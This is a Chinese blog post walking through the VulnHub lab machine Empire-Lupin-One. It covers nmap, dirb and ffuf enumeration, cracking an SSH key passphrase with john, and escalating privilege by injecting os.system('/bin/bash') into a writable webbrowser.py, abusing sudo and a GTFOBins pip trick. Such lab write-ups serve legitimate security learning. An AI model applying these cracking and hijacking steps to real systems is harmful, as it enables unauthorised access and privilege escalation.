首页 > 其他分享 >vulnhub靶机练习:01-Empire-Lupin-One

vulnhub靶机练习:01-Empire-Lupin-One

时间:2023-06-24 20:44:16浏览次数:55  
标签:6.63 01 http Lupin 172.88 vulnhub ffuf txt usr

这次用的是Oracle VM VirtualBox,避免用vmware出现的问题

靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/

arp-scan -l   扫描ip

 

kali:172.88.6.144

靶场:172.88.6.63/

1、扫描ip

nmap -A -sV -T4 -p- 172.88.6.63

 1.1 尝试访问ip

 1.2 目录扫描      dirb http://172.88.6.63/

扫描的结果又很多

 

 http://172.88.6.63/manual/ 

 

 打开页面源代码,发现

 1.3 使用 ffuf 工具暴力破解目录

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://172.88.6.63/~FUZZ'

 

http://172.88.6.63/~secret/

 

 

 

ffuf -u "http://172.88.6.63/~secret/.FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

找的过程不是太顺利

 http://172.88.6.63/~secret/.mysecret.txt

注意前面是有一个点  .mysecret.txt

 好像是BASE58能解开

 

将私钥复制到ssh.key文件中,注意kali的私钥命名方式

/usr/share/john/ssh2john.py ssh.key > hash

john --wordlist=/usr/share/wordlists/fasttrack.txt hash

找到密码   P@55w0rd!

 

想了半天,用户名是那个,于是向前找了找

 用户名:icex64   密码:P@55w0rd!

 

出现这个问题,百度了也找人了,终于给出结果了,是我在复制秘钥的时候出现了问题

 用vim写秘钥,将秘钥复制在vim的siyao.key中,给个600的权限

ssh [email protected] -i siyue.key 

 

然后就进来了

2.提权

发现一个文件

 

find / -perm -u=s -type f 2>/dev/null

 

 这里找到一个

icex64@LupinOne:~$ whereis webbrowser.py
webbrowser:
icex64@LupinOne:~$ locate webbrowser.py

icex64@LupinOne:~$ python --version
-bash: python: command not found
icex64@LupinOne:~$ python3 --version
Python 3.9.2

 

 

 看到这个两个文件与一个适合我们用的

修改 webbrower.py,添加以下代码

os.system ("/bin/bash")

 使用 vi 打开文件:vim /usr/lib/python3.9/webbrowser.py

执行以下命令切换 shell: sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

 访问:https://gtfobins.github.io/,查询 pip

 

 

 把这上面的代码复制下放到里面提权

 

 用到dirb、ffuf,还有GTFOBins,只能积累了

细节方面,在使用 ffuf 工具暴力破解目录和私钥的时候,注意别弄错了

 

标签:6.63,01,http,Lupin,172.88,vulnhub,ffuf,txt,usr
From: https://www.cnblogs.com/ndy619/p/17501658.html

相关文章

  • vulnhub靶场搭建
    vulnhub靶场搭建kali虚拟机安装1、更新sudoapt-getupdate2、安装docker.iosudoaptinstalldocker.io3、验证安装docker-v4、安装docker-composepipinstalldocker-compose5、拉取镜像gitclonehttps://github.com/vulhub/vulhub.git6、进行测试cdvulnhub......
  • LOJ#6077. 「2017 山东一轮集训 Day7」逆序对题解
    考虑朴素dp,令\(f_{i,j}\)为\(1\simi\)排列有\(j\)个逆序对的排列数。有转移方程:\[f_{i,j}=\sum_{k=0}^{i-1}f_{i-1,j-k}\]特殊地,我们定义\(j<0\)的\(f_{i,j}\)为\(0\)。定义\(\displaystyleF_i(x)=\sum_{j=0}^{\infty}f_{i,j}x^j\),有\(\displaystyleF_{i}(x)=......
  • SQL Server 2016 安装教程
    1.数据库的安装:(1)通过微软官网下载,在浏览器访问https://msdn.itellyou.cn/(2)选择合适的版本,下载安装(本次教程使用SqlServer2016)。......
  • vulnhub-xxe靶场通关(xxe漏洞续)
    vulnhub-xxe靶场通关(xxe漏洞续)下面简单介绍一个关于xxe漏洞的一个靶场,靶场来源:https://www.vulnhub.com这里面有很多的靶场。靶场环境需要自己下载:https://download.vulnhub.com/xxe/XXE.zip因为是外国的靶场,下载速度有点慢,也可以通过公众号——星光安全,回复“xxe靶场”获得。......
  • P9401
    之前的theme在我的老电脑上太卡了,就先不用了。换上了高贵的PinkRabbitCSS!gcd这个东西没啥最优化的好性质,就是一个log结构有点用。这题也用不到。先考虑枚举。注意到\(b_i,a_i\)不寻常的范围,如果选了一个\(a_i\),那么答案\(\le5\times10^5\)。特判全为\(b_i\)。......
  • Day1-01_12:
    【安装虚拟机】1.下载,安装https://www.virtualbox.org安装要开CPU虚拟2.app.vagrantup.com下镜像https://www.vagrantup.com/3.安装好vagrantup后,cmd命令:vagrantinitcentos/7vagrantupvagrantreload进入虚拟机:vargrangtsshexit(退出)【linux常用命令】whoamils/根......
  • Struts2漏洞学习(s2-001——s2-009)
    Struts2漏洞复现Struts2是一个基于MVC设计模式的Web应用框架S2-001漏洞原理:后端将用户之前提交的参数使用OGNL表达式%{}进行解析,然后重新填充到对应的表单数据中,例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL表达式......
  • sqlserver 2019安装
    选择"NewSQLServerstand-aloneinstallation"更新选项,跟windows的​更新服务有关:安装类型,选择全新安装:输入密钥,这里需要注意输入的密钥的类型:选择需要的组件: 配置命名实例:·不要使用具有管理员权限的账号作为服务账号·本地系统账号(NTService,NTAuthority)......
  • 01 后台系统登陆退出功能
    需求分析代码开发创建controller在reggie下创建一个entity包,复制资料/实体类下面的employee进来,并创建以下包:。在mapper包下创建EmployeeMapper的接口类,编写代码如下:。在service包下创建EmployeeService的接口类,编写代码如下:再在service的impl包下创建并编写这个服务的Empl......
  • Freertos学习01-Task Creat & Delete
    一、Freertos介绍FreeRTOS是一个开源的实时操作系统内核,它是由英国的RealTimeEngineersLtd.开发的。它提供了一些基本的内核功能,如任务管理、时间管理、信号量、队列和软件定时器等,可以帮助开发人员更容易地构建嵌入式系统。FreeRTOS是一个非常流行的实时操作系统内核,因为它是......